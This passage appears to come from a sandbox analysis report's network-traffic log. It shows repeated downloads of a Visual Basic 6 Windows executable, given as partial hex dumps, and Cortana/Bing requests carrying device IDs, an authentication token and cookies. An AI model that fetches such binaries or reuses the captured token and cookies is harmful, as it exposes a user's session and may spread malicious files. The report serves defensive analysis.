00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:02:05 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:02:06 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:02:17 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:02:18 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:02:20 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitX-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40Content-Type: text/plain;charset=UTF-8Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 429Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488707263&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CAFE605AAF964660B8479EEA5D4FD3FE&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=E6EAEF30D7E9C145923C068AFFFFFFFF; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
          Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 89768Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488707263&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CAFE605AAF964660B8479EEA5D4FD3FE&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=E6EAEF30D7E9C145923C068AFFFFFFFF; 